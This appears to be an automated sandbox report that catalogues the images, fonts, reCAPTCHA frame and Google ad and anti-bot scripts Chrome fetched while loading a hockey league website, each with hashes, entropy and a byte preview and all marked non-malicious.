                                                                                                                          Preview:GIF89a,...................q........ ".....Ph......{...a-T....g.. O.........PLL:..U.....qll...)Y........yDm...nD0|...$.....k.........O4'...y......g.......vRH...}.....+,......hf. ...$.....7....iP......K...Z.....r......4...............'..|r...0. .0h....u.....j..'........~......Y....... .....623....Yh^..q..p`WCQu....B..............4#...0.........}f......\.$+@i....J..5.TB.!...3....-.'..wR..........CD....R{.......................T1.1..t..T....=.7...5-#.......-E<.H....5...........$........t..........1.e.........R.$$'.d...........I.....5.L#..D.....c.......*..Xa{....0i.......#.2.......V8.......7..U....._.V?.~...........k.}.......Pg.c..B.0.q...@..*."*8...........!.f..J....S..../../L.e.6.x..........9.n#....~......t.....|..J...................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="h
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):889
                                                                                                                          Entropy (8bit):7.661585657627459
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:S/6p0WpoO7NJHabxgWdiZ/ZGr9zfWeEfiATRU1:S/6qWWOZJ2gB/8rNEf9TU
                                                                                                                          MD5:CEDA85DC6354796FD08C69A2032D2B29
                                                                                                                          SHA1:88814A3DAE3B5DB844E1EBC743B4617C9AF8B166
                                                                                                                          SHA-256:D1E95C82A1F0761DDC6F245A372A3954BBF32157A8DCDFF4659A0F9574ACE46B
                                                                                                                          SHA-512:E15949E990A278C6DCDF7FBEF76A41DC66209716B56BCF8FFC745FF615CDE7F00B167DE7FF9AE23B5B28C4111413535341F15E1A633EF28539644800E84FB015
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR...0...0.....W.......pHYs................+IDATx...O.A..7341...'#h.....?.G..(.......$.3E....../...1^...$.H.........c.V.n....-..&.....3....aD..).Tl.<C..Q.I.p.r.S.......k.q.W>k..%r.C?e.r.J.`^........-r&).ee...\"...1.1...cJ...A.N..8..w..K.C.o.._Z.Q...1O.......<..`.n].b.C0.............V.T.%:'......yVt.g...^.E..|.6.7l.Gq.M^L..b.R..tyry....Vu..J....[b....OW...A....t+....p...y7......~..eDy..Q...>e.O.z..[ih.P....5qs....e......yy..8......W9.c.................f..^....m.....-..p\a......N..s..V.cJe.........r*.....@..M..|..#........|."._d..p.B.\...T.B..X....&...Q..l.'....R@eT.GB..P...m..1nv.|...M./+.*.....>q..(b,........%..2../s.i.4..fo..4..0\.....f.......z.... ...IA.-....j...C[....Sil...M..y.O.v.[.=....kF...>7]:...V}.y..t....Dn.!...E.:.g.k....j.R..x.`.M...*....y.6./......p.xm...E..nW...hW..V-y%..G..S...)R$.`.7.!....l.....IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (829), with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):829
                                                                                                                          Entropy (8bit):5.3752319554807
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:4Hksx0q5/Jz2pRNrBZJuvu8goqc0ioNhc+TL4+mI:2x/z2bNrVENtmN+r+j
                                                                                                                          MD5:E420B9590A877F09690696984103019A
                                                                                                                          SHA1:C905C3F3766BBC0244626018E7101F19D07C3FE8
                                                                                                                          SHA-256:151B2F3CFA2BA8C032EA370B67818AAFFD196FEDB962D3C7E1ABD0D3F8FA5654
                                                                                                                          SHA-512:474E16D474DBAADE640093E978DDDCB6864167171FDDE3E06DABC360534C1ABE46B664EBBD7932ACA04BD4C937D0B28845904BF049DCC3D0BB12347185C4FBFD
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.google.com/recaptcha/api2/aframe
                                                                                                                          Preview:<!DOCTYPE HTML><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"></head><body><script nonce="s-wN8cLuIXrw6htydLASDw">/** Anti-fraud and anti-abuse applications only. See google.com/recaptcha */ try{var clients={'sodar':'https://pagead2.googlesyndication.com/pagead/sodar?'};window.addEventListener("message",function(a){try{if(a.source===window.parent){var b=JSON.parse(a.data);var c=clients[b['id']];if(c){var d=document.createElement('img');d.src=c+b['params']+'&rc='+(localStorage.getItem("rc::a")?sessionStorage.getItem("rc::b"):"");window.document.body.appendChild(d);sessionStorage.setItem("rc::e",parseInt(sessionStorage.getItem("rc::e")||0)+1);localStorage.setItem("rc::h",'1736802085084');}}}catch(b){}});window.parent.postMessage("_grecaptcha_ready", "*");}catch(b){}</script></body></html>
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=9, manufacturer=Canon, model=Canon EOS 2000D, orientation=upper-left, xresolution=144, yresolution=152, resolutionunit=2, datetime=2022:11:19 05:53:50], baseline, precision 8, 730x420, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):57890
                                                                                                                          Entropy (8bit):7.960805690416624
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:SRebAxk6BoOYnAUGzPyiSO0NUNamzreenzyuNy2F3:EiKBYnGzqiocreeOuEG
                                                                                                                          MD5:5AB7D753310BE7140088FDB96B9CE6FA
                                                                                                                          SHA1:F47844FCBDBF3C5C2649F5AEBAA02163CC173479
                                                                                                                          SHA-256:A63F5F890C1696AB9EAC5664366120263B9C30B4B3D6E71B10E40BD443356111
                                                                                                                          SHA-512:B796217A92A45F5C899220E24818ADCE3AE8ED5AC8381C53C903283C5B6CE8761208EFB5237C21A76B512CF17DF0504E625120D474F8D307B01EB160CCDECD74
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.....H.H.....,Exif..MM.*.................z.................................................(...........2.......................i..............Canon.Canon EOS 2000D....H.......H....2022:11:19 05:53:50..#...........^...........f."...........'...........0...........2..................0230...........n....................................................................................................................93..........93..........93..........0100.......................p................................................................................................1..........2..........4...........5.....................(........2022:11:19 05:53:50.2022:11:19 05:53:50....+..........................u,.........O@......=.....Q287031002628..................................EF-S18-200mm f/3.5-5.6 IS.00004609b9.......(ICC_PROFILE.......appl....mntrRGB XYZ ............acspAPPL....APPL...........................-appl....8.G.m..Oz../................................desc.......0cprt
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 57x57, segment length 16, baseline, precision 8, 730x410, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):93722
                                                                                                                          Entropy (8bit):7.96536294250091
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:KpEbKRv6lhJ+9+4f2B81b698ue9qoFxrEuzIOc1skjfGLqz+ekhfrf1n7:/uC7J+9+4U8s98VjHIOc1XGLqGhfrt7
                                                                                                                          MD5:3C6DC49970F3CC5916494CD761497389
                                                                                                                          SHA1:A4DD445CFE7437F226274A93F0BE78503BF3B8B2
                                                                                                                          SHA-256:421A65F008582C07F8CE9084CC6D8CF0D64CA18CF7BE377ECEDBFEA3658281D1
                                                                                                                          SHA-512:903E8B1586EA48B2D383CF0D3988ED13EA07DC25381773D1EAA15A113CCF42384A0E79CF17123F164FD332788864DC3AC8E07FB85C81083C572FEC2825B86C62
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.....9.9......ICC_PROFILE.......appl....mntrRGB XYZ ...........-acspAPPL....APPL...........................-appl................................................desc...P...bdscm........cprt...P...#wtpt...t....rXYZ........gXYZ........bXYZ........rTRC........aarg....... vcgt.......0ndin... ...>mmod...`...(vcgp.......8bTRC........gTRC........aabg....... aagg....... desc........Display.................................................................................mluc.......&....hrHR........koKR........nbNO........id..........huHU........csCZ.......0daDK.......FnlNL.......bfiFI.......xitIT........esES........roRO........frCA........ar..........ukUA........heIL........zhTW.......$viVN........skSK.......<zhCN.......$ruRU...$...RenGB.......vfrFR........ms..........hiIN........thTH........caES........enAU.......vesXL........deDE........enUS........ptBR........plPL......."elGR..."...4svSE.......VtrTR.......fptPT.......zjaJP.........L.C.D. .u. .b.o.j.i.... .L.C.D.F.a.r.g.e.-.L.C.D.L.C
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (1403), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1403
                                                                                                                          Entropy (8bit):5.205566886030266
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:969Pq3wW5dmPOZ5uinWZuwcDye3mbyskHLwgZ77ewAhFTrxVq+:9kAwgkmXUUwcDXmbyskEFrxVq+
                                                                                                                          MD5:0203F8B4D98102D02F6A569C40A47D7B
                                                                                                                          SHA1:DDBACA6C9C625BEB5E018AF6626FC12FEA0D889E
                                                                                                                          SHA-256:892ECB8E84801900FBEC1F9F340F9DD7D53A6444079D82DDA76D41581C501891
                                                                                                                          SHA-512:232B659C09D34DD8714DD4A0302BF97762AECF132B0165CB6C810DD265FFEFB33AF1200CBB5AB93BAA0E873D875D5EF4AEF5C91263D616B403DBFE002203500A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:!function(a,b){"use strict";function c(){if(!e){e=!0;var a,c,d,f,g=-1!==navigator.appVersion.indexOf("MSIE 10"),h=!!navigator.userAgent.match(/Trident.*rv:11\./),i=b.querySelectorAll("iframe.wp-embedded-content");for(c=0;c<i.length;c++)if(d=i[c],!d.getAttribute("data-secret")){if(f=Math.random().toString(36).substr(2,10),d.src+="#?secret="+f,d.setAttribute("data-secret",f),g||h)a=d.cloneNode(!0),a.removeAttribute("security"),d.parentNode.replaceChild(a,d)}else;}}var d=!1,e=!1;if(b.querySelector)if(a.addEventListener)d=!0;if(a.wp=a.wp||{},!a.wp.receiveEmbedMessage)if(a.wp.receiveEmbedMessage=function(c){var d=c.data;if(d.secret||d.message||d.value)if(!/[^a-zA-Z0-9]/.test(d.secret)){var e,f,g,h,i,j=b.querySelectorAll('iframe[data-secret="'+d.secret+'"]'),k=b.querySelectorAll('blockquote[data-secret="'+d.secret+'"]');for(e=0;e<k.length;e++)k[e].style.display="none";for(e=0;e<j.length;e++)if(f=j[e],c.source===f.contentWindow){if(f.removeAttribute("style"),"height"===d.message){if(g=parseIn
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 57x57, segment length 16, baseline, precision 8, 730x355, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60211
                                                                                                                          Entropy (8bit):7.939964647392253
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:YpEtISXRarBnPypfrrspd1joGNcHJKFXHsiaKI:TfaRKpf8pSxH
                                                                                                                          MD5:7B142D0C22482E370C8144D20A1D80CF
                                                                                                                          SHA1:204CE546175A519ECDF9123756BD21E26DE4EEB3
                                                                                                                          SHA-256:7D8376F0F9AB732304781732A3CD53C32CDACEC36085D9F52DEF6F4EA8541FED
                                                                                                                          SHA-512:2F73CAD0A7BF72A3B6B8811052A561C5896698D52A33B3A16E24D2FCD295677D7FB7C8FB82739029BAB33570E8ECBE8700C30403448C4F99E1B04FCC66444709
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.....9.9......ICC_PROFILE.......appl....mntrRGB XYZ .........%."acspAPPL....APPL...........................-appl................................................desc...P...bdscm........cprt...P...#wtpt...t....rXYZ........gXYZ........bXYZ........rTRC........aarg....... vcgt.......0ndin... ...>mmod...`...(vcgp.......8bTRC........gTRC........aabg....... aagg....... desc........Display.................................................................................mluc.......&....hrHR........koKR........nbNO........id..........huHU........csCZ.......0daDK.......FnlNL.......bfiFI.......xitIT........esES........roRO........frCA........ar..........ukUA........heIL........zhTW.......$viVN........skSK.......<zhCN.......$ruRU...$...RenGB.......vfrFR........ms..........hiIN........thTH........caES........enAU.......vesXL........deDE........enUS........ptBR........plPL......."elGR..."...4svSE.......VtrTR.......fptPT.......zjaJP.........L.C.D. .u. .b.o.j.i.... .L.C.D.F.a.r.g.e.-.L.C.D.L.C
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):15344
                                                                                                                          Entropy (8bit):7.984625225844861
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:ctE5KIuhGO+DSdXwye6i9Xm81v4vMHCbppV0pr3Ll9/w:cqrVO++tw/9CICFbQLlxw
                                                                                                                          MD5:5D4AEB4E5F5EF754E307D7FFAEF688BD
                                                                                                                          SHA1:06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
                                                                                                                          SHA-256:3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
                                                                                                                          SHA-512:7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                                                                          Preview:wOF2......;........H..;..........................d..@..J.`..L.T..<.....x.....^...x.6.$..6. ..t. ..I.h|.l....A....b6........(......@e.]...*:..-.0..r.)..hS..h...N.).D.........b.].......^..t?.m{...."84...9......c...?..r3o....}...S]....zbO.../z..{.....~cc....I...#.G.D....#*e.A..b...b`a5P.4........M....v4..fI#X.z,.,...=avy..F.a.\9.P|.[....r.Q@M.I.._.9..V..Q..]......[ {u..L@...]..K......]C....l$.Z.Z...Zs.4........ x.........F.?.7N..].|.wb\....Z{1L#..t....0.dM...$JV...{..oX...i....6.v.~......)|.TtAP&).KQ.]y........'...:.d..+..d..."C.h..p.2.M..e,.*UP..@.q..7..D.@...,......B.n. r&.......F!.....\...;R.?-.i...,7..cb../I...Eg...!X.)5.Aj7...Ok..l7.j.A@B`".}.w.m..R.9..T.X.X.d....S..`XI..1... .$C.H.,.\. ..A(.AZ.................`Wr.0]y..-..K.1.............1.tBs..n.0...9.F[b.3x...*$....T..PM.Z-.N.rS?I.<8eR'.3..27..?;..OLf*.Rj.@.o.W...........j~ATA....vX.N:.3dM.r.)Q.B...4i.f..K.l..s....e.U.2...k..a.GO.}..../.'..%$..ed.*.'..qP....M..j....../.z&.=...q<....-..?.A.%..K..
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 730x411, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):65724
                                                                                                                          Entropy (8bit):7.970053871178775
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:jrpN3wNlZyG/8NAjvo1NgVrFDLHwzuVc11+Q:HpN3wxyejg1Nm4zu+b+Q
                                                                                                                          MD5:D47BF6F189B1305801E65B70197EAF75
                                                                                                                          SHA1:0CE67B6C30B37386C2848D8DDCFE979E4C3C5D77
                                                                                                                          SHA-256:73069711AC5EC4117412964A29908664C8288EB06A4EE97690C640E2C7698EFD
                                                                                                                          SHA-512:BD8B5289DB8136523AD9D4C754841F1E09CD75D8F668A800A2F58929BC0F898A78617F9D52E26859F903A89AFCB97556B97AA71D0422C5FB1BF9654219FDF020
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2025/01/02154916/AROUND-THE-G-TITLE-January-2025-2-730x411.jpg
                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C............................................................................"..........................................h..........................!1.AQ.."aq.2....#BR..b...$3r...CScs.....%5..'467ETdu..&(DFfv....8UVetw......................................C........................!1..AQ.."2aq....R...#3BS...$......%4C.s..............?...RoJ5f.......I*...P.E.J/s..=tP..3..A..z<....&3*.V.f..m..4Z{./.w.r...FK.H..HJ.fB..+..[...IB.t,e..m ...s..i9Rt...P.....r........r.r...U..a.2.M........n.P..".....y:.BN.+.h......>.^...>.......F......W..B...>pqa.k.....H.;\.9..k7....{B..x.......I*.[./.E.....NI.Yrrl..H...R.:.........O..)[....tKK}...9m........9z..4.C......E..P..)W...'M.....f^m...SWJ..I.L.......r.@.3.M.b.i..5n......U.W.....S......IU.B.d.mO().W.;1J.....`u.., ...M..lH6.K.X...J.!..........)......aF.i.r..na+..,..H.!.\]I.*"...BD$]ZF...2.-.g_8b.Q..4q(x..o.8*.M.E..u..*..v..@.$.^.E ....zG$.n
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 730x411, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):55635
                                                                                                                          Entropy (8bit):7.972871942956839
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:iLteGcPr2ObWVkuUf2/s8ZkJ6Ul0lyWtY:iLt3Er3ppf208ZARWl4
                                                                                                                          MD5:7AFC5F802A25B045E6029FED8EC78A9C
                                                                                                                          SHA1:4A565E8C0FF1A7AF5830B1D9D2E902AF82EEADFB
                                                                                                                          SHA-256:A3504C81E91D7356190D1205D5326AC053E3DF74C39EE807B86ACC3D726C2250
                                                                                                                          SHA-512:1452E13D07DA31181BA05D5E275EE88142D386505C48971BD5CDCB529E22334BD5D88D45B1D8801ABC607008EA5431905E1E2BD5C04FBA4812B4C8B18DA437F4
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/12/23150859/2025-GTHL-Playoffs-1600x900-Web-730x411.jpg
                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C............................................................................".........................................^.........................!..1..AQa."q..#2BR......$3br....CS..%F.......4Wcs....&5D..6EGTYd....................................F........................!1.A..Q"aq...2.....#B..Rb...r....$3C.4DEScs.............?.....b.~.$...t.V..a.Y.56.R+N..Q..H.G...@.....(B....=(.P. ...(qI.....(@...u..Y...$..Y.....f.;&...j].<|.%.~...T...G.>my.j-..cN....VBtT...T...\jz.i$...JI@..f.X.Q*T..{..c4b7.........SB\5....Z..SO..[..V:T..Nnm...E...?...R..."..'.Rx...%...b...D.v(....D.....P..(1G..."....../Q7.=.G...u6E..C|*kR........T.......w/.../S.Oh..}m..P.e..k.N*...>.H.[.g.....E..M..Z.e..'.[...&.;.{.,.,...z.......2...mo.u..kL..W#.NI8.I.....x.)y..+..+<3..u.'..:..`<=..e..6B.........l-.v...^..>E..I.Z....P..S.YJ....xs..'[.eR.hK....C....*j*6.j.y.I.IHSr.R}...U{Hpv.j.q_...G7..*.c.s!.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):817
                                                                                                                          Entropy (8bit):7.598861335957131
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:S/6ydI0A7cO+e+FQiyaCmyZbYcrK9iSjBaYUMjAdT:S/65zcO24my9NWBadMuT
                                                                                                                          MD5:11C4233C46670A65187B0D2A340A2352
                                                                                                                          SHA1:E94B734A99725468C47F392861E3A07A1CDBD878
                                                                                                                          SHA-256:5BD684A218D48335A4907DDE8C27CB895EE567CD8FD8D3EF1480CF9C5192F3A0
                                                                                                                          SHA-512:560D9399896E3CE7F59B5701407F9AFA1AA61C34FDB9E4CBF04E509ADF6D3E8B20CCDB3771484E9EA4FB28FC0A77CB06C17569FA17D7326E5DE7A307E0A8A99C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/08/29093926/icons8-rss-48-1.png
                                                                                                                          Preview:.PNG........IHDR...0...0.....W.......pHYs.................IDATx...KTq.....X..(.z,jST....(J....MA..p...k~.e.b&..G....Y-..Pz.a.Lj....42...6..s...........s~.33J...(..EH.G..B*.Vxb!.!...pn.ku...#L.\v>...Y..L.....-...j^..p.......0>.#oa.......P..U......o/..$T....qMG..-..m...j.^WB....h..9P.....i.<9..Zaj.GI.4...@;...~...:..].m./.t.......Mpe.....K...1..M...0m..9@.....s&Js....e0.....K..d$v...>..{.,7u.R2&.."..L.....T.J..{9..C..,..5....c.........'...*..S@....LC.....l1.....s...f..^g....xw=K.....G`.!.......(T...@.V.......0....u"..3..!.]....q.Vv/......z/.}.. ...+.]..AM...0.>...d...,.:_v...-.\.....v_2.4vd......]l....5..( .L.}{....s. ..q.`..@>OuL~.2..n....y.d....l..Hc;.G...r....=p{...N..6.g^^d.....B.......7..7...2..;..{..>@..y|b..d....3c!.7m.?Y(.A.3.>..@R.._Lz..|.@..)...O.v........IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (64561)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):510147
                                                                                                                          Entropy (8bit):5.51633636669842
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:VAA8QBv6rKRulVD2xJh+ZV5rerjKcIbUtxhJePFr/tIYSDuBFf7oPz1ZNNdoa:quRuld2xIr73bUtXCr7SDuBFfsPz1ZNr
                                                                                                                          MD5:807C1D994B1601F772E569DC1924102A
                                                                                                                          SHA1:0E14FC89697C2D4467CC881596496E3012B1EA81
                                                                                                                          SHA-256:C4DC43341628FF3F8C6F411EBDBD2DAB440E758BEB666AD7467C79B1ACAC38E5
                                                                                                                          SHA-512:9CCAC008EF03668AE7321B3C39D8E729F33B3903BF02B89DA054B3D353AC8BE7D92E609D6A0D17E1CE36D2114BBE70CC2EFF21B4057FEE451A96385D191385CE
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://securepubads.g.doubleclick.net/pagead/managed/js/gpt/m202501070101/pubads_impl.js
                                                                                                                          Preview:(function(_){/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ ./* . . Copyright Google LLC . SPDX-License-Identifier: Apache-2.0 .*/ ./* . . . Copyright (c) 2015-2018 Google, Inc., Netflix, Inc., Microsoft Corp. and contributors . Licensed under the Apache License, Version 2.0 (the "License"); . you may not use this file except in compliance with the License. . You may obtain a copy of the License at . http://www.apache.org/licenses/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software . distributed under the License is distributed on an "AS IS" BASIS, . WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. . See the License for the specific language governing permissions and . limitations under the License. .*/ ./* . .Math.uuid.js (v1.4) .http://www.broofa.com .mailto:robert@broofa.com .Copyright (c) 2010 Robert Kieffer .Dual licensed under the MIT and GPL licenses. .*/ .var ba,ca,fa,ha,la,sa,va,
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (1382)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):17945
                                                                                                                          Entropy (8bit):5.330388445341784
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:AbnElW+CdYyqBFy9G/JtCHAOgRImVWsc5JZB:Ll3CdnqC9ct2A1ImVWsc5h
                                                                                                                          MD5:3B071D5606CC1CF92AE307F5BDB4E540
                                                                                                                          SHA1:E191068CC90E5489130489A1CF173FE50BBA28B8
                                                                                                                          SHA-256:FF3DE130872FE0FB5B770DFA2BC9F0DAF8AB320403A34A60D089436F08D24F99
                                                                                                                          SHA-512:8A1287D7528B2B65D61D6E0A639F2CBE5658AFC3EDB5E2AF9494E8CC876AA6C8060A55D3BD4AA85A0B3B82733E64F7F7A6B4A5F2597FD99FD37136A83A6BBCAD
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://ep2.adtrafficquality.google/sodar/sodar2.js
                                                                                                                          Preview:(function(){'use strict';function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var k=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var n=ba(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",r={},u={};function w(a,b,c){if(!c||a!=null){c=u[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}}.function x(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var g=d[0],f;!a&&g in r?f=r:f=n;for(g=0;g<d.length-1;g++){var e=d[g];if(!(e in f))break a;f=f[e]}d=d[d.length-1];c=p&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?k(r,d,{configurable:!0,writable:!0,value:b}):b!==c&&(u[d]
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 728x90, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):63506
                                                                                                                          Entropy (8bit):7.91603752918064
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:/vKVj8neWIb3ZLURIFWwH/BwaKw94gFz/P:/vKl8neWIbSRIFxdugFzX
                                                                                                                          MD5:BA30E3CEB3A02F8F4C7F8E8339FB1528
                                                                                                                          SHA1:5D0D0F68031C4496812C13E363D5228FA4DEF1B5
                                                                                                                          SHA-256:72EF9FD7D76A2D17537B3D28C8DBCA482E4429AC2AE49B3909A66E8616B7B269
                                                                                                                          SHA-512:FD09210549CDE8629E996A1CF3672406D0BFE7CD8BE9068852E99E863D6E100319DA66A5E6831A7825D4CB76740F5E37C1AF72DAAFAAD3A2B39656F608791593
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.....H.H.....,Photoshop 3.0.8BIM.........H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Refer
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (18300)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):18920
                                                                                                                          Entropy (8bit):5.648118877162723
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:byXIWN4tQu5vxh+g+k4Q/NOLxMgTy3e9naesPB8wEy1tj1GKxR:by4ft1N+u/NOOupaeEHPGW
                                                                                                                          MD5:46074F20715B2E1D71813FE06D27F940
                                                                                                                          SHA1:0A1F5FA5E8EE3161EE0A7FCF754FEA35A4D6C3F5
                                                                                                                          SHA-256:19A614A48DD333665E26B26E63AB2174D2C904455065DF375EA23564AA3D6526
                                                                                                                          SHA-512:0A3A595CFD90F343A04FAC3F108CF283F935F8C8FE6C0FF6DBCD581F24F8CD20792EA4097865E69427B95C2DF3060D7CE8E4B9373BD31D787F2CEB8D47E1C02A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:/* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var P=function(H){return H},u=this||self,x=function(H,r){if((r=(H=null,u).trustedTypes,!r)||!r.createPolicy)return H;try{H=r.createPolicy("bg",{createHTML:P,createScript:P,createScriptURL:P})}catch(c){u.console&&u.console.error(c.message)}return H};(0,eval)(function(H,r){return(r=x())&&H.eval(r.createScript("1"))===1?function(c){return r.createScript(c)}:function(c){return""+c}}(u)(Array(Math.random()*7824|0).join("\n")+['(function(){/*',.'',.' Copyright Google LLC',.' SPDX-License-Identifier: Apache-2.0',.'*/',.'var g=function(H,r,c,x,y,u,G,D){if(!c.GC&&(u=void 0,r&&r[0]===C&&(H=r[1],u=r[2],r=void 0),y=k(c,84),y.length==0&&(x=k(c,90)>>3,y.push(H,x>>8&255,x&255),u!=void 0&&y.push(u&255)),H="",r&&(r.message&&(H+=r.message),r.stack&&(H+=":"+r.stack)),r=k(c,218),r[0]>3)){c.i=(r=(H=(r[0]-=(H=H.slice(0,(r[0]|0)-3),(H.length|0)+3),i6(H)),c).i,c);try{c.hL?(D=(D=k(c,2))&&D[D.length-1]||95,(G=k
